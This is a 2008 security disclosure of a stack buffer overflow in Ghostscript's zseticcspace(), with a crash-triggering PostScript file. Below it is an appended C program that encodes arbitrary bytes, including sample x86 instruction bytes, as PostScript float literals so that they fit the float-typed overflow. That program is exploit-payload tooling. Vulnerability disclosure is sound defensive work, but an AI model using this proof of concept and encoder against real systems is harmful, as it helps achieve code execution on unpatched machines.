
| Subject: | Ghostscript buffer overflow |
|---|---|
| Date: | Thu, 28 Feb 2008 14:57:42 -0800 |
Hi,

Buffer overflow in Ghostscript. A useful attack vector because a lot of UNIX workstations will put PS files on the web through Ghostscript.

The problem is a stack-based buffer overflow in the zseticcspace() function in zicc.c. The issue is over-trust of the length of a PostScript array, which an attacker can set to an arbitrary length.

One slight amusement is that the overflowed type is "float", leading to machine code -> float conversion in any exploit.

An example .ps file to trigger a crash follows:

```postscript
%!PS-Adobe-2.0
<< /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace
```

Announcement:
http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html

Full technical details including a demo exploit by my colleague Will Drewry:
http://scary.beasts.org/security/CESA-2008-001.html

Cheers
Chris
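The message points out that the overflowed stack buffer holds floats, so any payload has to be carried as PostScript real literals that the interpreter converts back into the intended 32-bit patterns. The following is an added example, not code from the original post or from the CESA-2008-001 exploit: a small C encoder that turns an arbitrary byte string into a PostScript array of real literals and checks, group by group, whether the text -> float -> memory round trip preserves the bits. It assumes 32-bit IEEE-754 floats, a little-endian host, and that the target's number scanner behaves like strtof (a simplification of Ghostscript's actual scanner); the SAMPLE bytes are constructed for illustration and are not shellcode from the advisory.

```c
/*
 * Added example (not from the original post or the advisory's exploit).
 * Encodes a byte blob as PostScript real literals, one 32-bit group per
 * literal, and reports which groups cannot survive the round trip.
 *
 * Assumptions: 32-bit IEEE-754 float, little-endian host, and a target
 * number parser with strtof-like semantics (simplification of Ghostscript).
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LIT_MAX 32

/* Render one 4-byte group as a PostScript real literal.
 * Returns 1 if strtof() parses the literal back to the identical 32 bits,
 * 0 otherwise (NaN/Inf patterns have no PostScript literal; "0" is written). */
static int encode_group(const unsigned char in[4], char lit[LIT_MAX])
{
    uint32_t bits;
    float f;
    memcpy(&bits, in, 4);

    /* Exponent field all ones means NaN or infinity: not expressible. */
    if (((bits >> 23) & 0xffu) == 0xffu) {
        snprintf(lit, LIT_MAX, "0");
        return 0;
    }
    memcpy(&f, &bits, 4);

    /* 9 significant digits are enough for every finite float to round-trip. */
    snprintf(lit, LIT_MAX, "%.9g", f);

    /* PostScript needs a '.' or an exponent to treat the token as a real;
     * otherwise it would become an integer object. Force the real form. */
    if (strchr(lit, '.') == NULL && strchr(lit, 'e') == NULL &&
        strchr(lit, 'E') == NULL) {
        strncat(lit, ".0", LIT_MAX - strlen(lit) - 1);
    }

    float back = strtof(lit, NULL);
    uint32_t back_bits;
    memcpy(&back_bits, &back, 4);
    return back_bits == bits;
}

/* Does this 4-byte group survive text -> float -> memory unchanged? */
int group_round_trips(const unsigned char in[4])
{
    char lit[LIT_MAX];
    return encode_group(in, lit);
}

/* Encode a blob (length must be a multiple of 4) as "[ lit lit ... ]".
 * Returns the number of groups that could not be encoded exactly,
 * or -1 on bad length / output buffer too small. */
int encode_blob(const unsigned char *buf, size_t len, char *out, size_t outsz)
{
    if (len % 4 != 0 || outsz < 4)
        return -1;
    int bad = 0;
    int n = snprintf(out, outsz, "[");
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    size_t pos = (size_t)n;
    for (size_t i = 0; i < len; i += 4) {
        char lit[LIT_MAX];
        if (!encode_group(buf + i, lit))
            bad++;
        n = snprintf(out + pos, outsz - pos, " %s", lit);
        if (n < 0 || (size_t)n >= outsz - pos)
            return -1;
        pos += (size_t)n;
    }
    n = snprintf(out + pos, outsz - pos, " ]");
    if (n < 0 || (size_t)n >= outsz - pos)
        return -1;
    return bad;
}

/* Constructed sample input (not the advisory's payload): xor eax,eax; nop; nop;
 * four int3 bytes; and a quiet-NaN pattern that cannot be expressed. */
static const unsigned char SAMPLE[] = {
    0x31, 0xc0, 0x90, 0x90,
    0xcc, 0xcc, 0xcc, 0xcc,
    0x00, 0x00, 0xc0, 0x7f
};

/* Number of SAMPLE groups that do not round-trip. */
int sample_bad_groups(void)
{
    char out[256];
    return encode_blob(SAMPLE, sizeof SAMPLE, out, sizeof out);
}

int main(void)
{
    char out[256];
    int bad = encode_blob(SAMPLE, sizeof SAMPLE, out, sizeof out);
    printf("%s\n%d group(s) not representable\n", out, bad);
    return 0;
}
```

The practical lesson is that a float-typed overflow constrains the payload: any 4-byte group whose exponent field is all ones (NaN or infinity) has no PostScript literal, so an exploit has to avoid or re-encode those byte patterns, while every other finite pattern, including subnormals and negative zero, can be expressed with nine significant digits.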